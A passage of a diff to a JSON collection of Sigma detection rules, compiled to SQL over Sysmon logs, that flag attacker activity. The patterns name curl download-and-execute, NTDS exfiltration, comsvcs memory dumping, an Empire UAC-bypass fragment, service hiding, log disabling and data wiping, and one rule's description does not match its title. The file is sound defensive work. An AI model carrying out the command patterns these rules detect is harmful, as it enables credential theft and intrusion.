'\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% 
/startup%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "status": "test", + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron 
Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + "description": "Detects the execution of \"whoami.exe\" with the 
\"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", - "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "status": "test", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], 
"falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": 
"stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine 
LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND 
CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "SC.EXE Query Execution", - "id": "57712d7a-679c-4a41-a913-87e7175ae429", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1007" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID", - "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE 
'%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_query.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", - "status": "experimental", - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "author": "omkar72", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE 
'\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], + "falsepositives": [ + "Other programs that cause these patterns (please report)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + }, + { + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": 
"proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_download_office_domain.yml" + }, + { + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" 
(For example from the compatibility tab)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
